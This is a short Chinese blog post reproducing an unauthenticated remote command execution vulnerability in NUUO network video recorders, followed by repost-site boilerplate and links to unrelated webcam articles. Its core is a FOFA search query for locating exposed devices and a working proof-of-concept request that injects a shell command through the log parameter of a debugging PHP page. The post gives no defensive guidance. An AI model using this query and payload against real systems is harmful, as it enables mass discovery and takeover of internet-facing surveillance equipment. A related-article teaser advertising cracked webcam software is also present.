NUUO网络摄像头(NVR)RCE漏洞复现

10月前作者：Ling-cheng 分类：Toy博客阅读(53) 违法举报

这篇具有很好参考价值的文章主要介绍了NUUO网络摄像头(NVR)RCE漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

简介

NUUO Network Video Recorder（NVR）是中国台湾NUUO公司的一款网络视频记录器。

NUUO NVR视频存储管理设备的__debugging_center_utils___.php文件存在未授权远程命令执行漏洞，攻击者可在没有任何权限的情况下通过log参数执行任意命令。

漏洞复现

FOFA语法：

title="Network Video Recorder Login"

NUUO网络摄像头(NVR)RCE漏洞复现,漏洞复现,安全

访问页面如下，不同版本会有区别

NUUO网络摄像头(NVR)RCE漏洞复现,漏洞复现,安全

POC： /__debugging_center_utils___.php?log=;id

GET请求：http://ip:port/__debugging_center_utils___.php?log=;id

返回内容如下：

NUUO网络摄像头(NVR)RCE漏洞复现,漏洞复现,安全

成功执行linux id命令

poc: /__debugging_center_utils___.php?log=;id;help文章来源地址https://www.toymoban.com/news/detail-745476.html

到了这里，关于NUUO网络摄像头(NVR)RCE漏洞复现的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

LiveGBS流媒体平台GB/T28181功能-海康大华宇视华为NVR等4G摄像头自带物联网卡注册国标平台后看不到设备的时候如何排查及抓包

看看是不是自带物联网卡的摄像头，如果是，得联系设备厂家设置定向IP 海康部分设备萤石云和GB28181不能同时开启，关闭设备的萤石云注册，单独启用GB28181注册。系统自身的防火墙是否开启，开启后可以尝试关闭试试。如果服务器外面还有物理防火墙，系统本身的防火墙可

2024年02月11日
浏览(97)
LiveGBS流媒体平台GB/T28181功能-如何获取接入的海康大华宇视华为摄像头硬件NVR设备通道视频直播流地址HLS/HTTP-FLV/WS-FLV/WebRTC/RTMP/RTSP

LiveGBS国标GB/T28181流媒体服务器软件，支持设备|平台GB28181注册接入、向上级联第三方国标平台，可视化的WEB页面管理(页面源码开源)；支持云台控制、设备录像检索、回放，支持语音对讲，用户管理，多种协议流输出，实现浏览器无插件直播。在项目过程中，需要播放视频

2024年03月25日
浏览(75)
网络摄像头:SparkoCam Crack

使用佳能/尼康数码单反相机作为常规网络摄像头通过向实时视频聊天和视频录制添加酷炫的网络摄像头效果和图形来增强 USB 网络摄像头视频拆分您的单个网络摄像头并在多个应用程序中同时使用它将佳能/尼康数码单反相机转换为网络摄像头，并将其用于聊天或视频录制

2024年02月11日
浏览(55)
Qt音视频开发42-网络推流（视频推流/本地摄像头推流/桌面推流/网络摄像头转发推流等）

上次实现的文件推流，尽管优点很多，但是只能对现在存在的生成好的音视频文件推流，而现在更多的场景是需要将实时的视频流重新推流分发，用户在很多设备比如手机/平板/网页/电脑/服务器上观看，这样就可以很方便的将分散的视频流统一集中的流媒体服务器上，然后统

2024年02月03日
浏览(48)
电脑获取网络摄像头图像及调用

目前市面上常见的摄像头大体有以下几种类型，一种是usb摄像头，一种是带wifi网络摄像头，还有一种有线网络摄像头，通过一根网线连接电脑用于传输图像。本文主要讲解下有线网络摄像头的调用配置。这种摄像头一般有两个接口，分别是网口和电源口，接线非常简单就是

2024年02月01日
浏览(50)
C# 搜索海康威视网络摄像头

源代码 https://download.csdn.net/download/syukugai/88299251

2024年02月10日
浏览(53)
请注意，网络摄像头很不安全

*** 重要说明：仅用于交流网络安全测试技术，并唤起大家对网络安全和个人隐私的重视，如用本文的技术干违法的事情，博主概不负责。*** 最近一段时间在研究摄像头等产品的安全性，发现一些摄像头还是挺不安全的，下面就依实际的案例向大家展示现在的网络摄像头不安

2024年04月26日
浏览(58)
WVP+ZLMediaKit实现网络摄像头接入

记录下本地调试监控摄像头相关信息。参考来源：部署 WVP+ZLMediaKit 实现大华摄像头接入_wvp zlm_鬼畜的稀饭的博客-CSDN博客 ZLMediaKit 代码地址 WVP 代码地址 ⚠️ 摄像头需要连接PoE设备来供电（插网线就能供电）资源清单：硬件海康威视网络摄像机型号：DS-2CD7A2…-IZ 2.8-

2024年02月15日
浏览(70)
如何降低海康、大华等网络摄像头调用的高延迟问题（一）：海康威视网络摄像头的python sdk使用（opencv读取sdk流）

目录 1.python sdk使用 1.海康SDK下载 2.opencv读取sdk流先说效果，我是用的AI推理的实时流，延迟从高达7秒降到小于1秒如果觉得这个延迟还不能接受，下一章，给大家介绍点上不得台面的小方法 SDK（Software Development Kit）是软件开发工具包的缩写，它是一组用于开发特定软件或

2024年02月07日
浏览(95)
OpenCV获取网络摄像头实时视频流

参考文章： [常用工具] OpenCV获取网络摄像头实时视频流_opencv网络摄像头 [常用工具] OpenCV获取网络摄像头实时视频流_opencv网络摄像头_落痕的寒假的博客-CSDN博客在使用OpenCv处理视频时，无论是视频文件还是摄像头画面，都要使用VideoCapture类来进行每一帧图像的处理。当我们

2024年02月01日
浏览(64)